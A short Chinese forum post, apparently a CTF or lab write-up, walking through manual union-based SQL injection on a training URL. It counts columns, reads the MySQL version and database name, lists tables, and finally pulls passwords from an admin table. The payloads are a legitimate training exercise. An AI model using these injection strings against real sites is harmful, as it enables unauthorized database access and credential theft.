第一课个人思路

2366338082   ·   发表于 2018-09-23 22:42:42   ·   CTF&WP专版

第一题URL为http://120.203.13.75:6815/?id=1

第一步进行手工注入and 1=1 正常显示文章内容 and 1 =2 不显示文章内容;

进行order by  进行查询字段 order by 10  不显示内容  用到我们了解到的二分之一方法  最后显示内容;

开始查询数据库版本 and 1=2 union select 1,version()    得到数据库版本5.5.53 ,百度MySQL5.5.53数据库爆出表名语句;

查询数据库名称and 1=2 union select 1,database()         得到名称maoshe ;

查询表名and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

最后查询密码and 1=2 union select 1,password from admin;






打赏我,让我更有动力~

0 条回复   |  直到 2018-9-23 | 1299 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.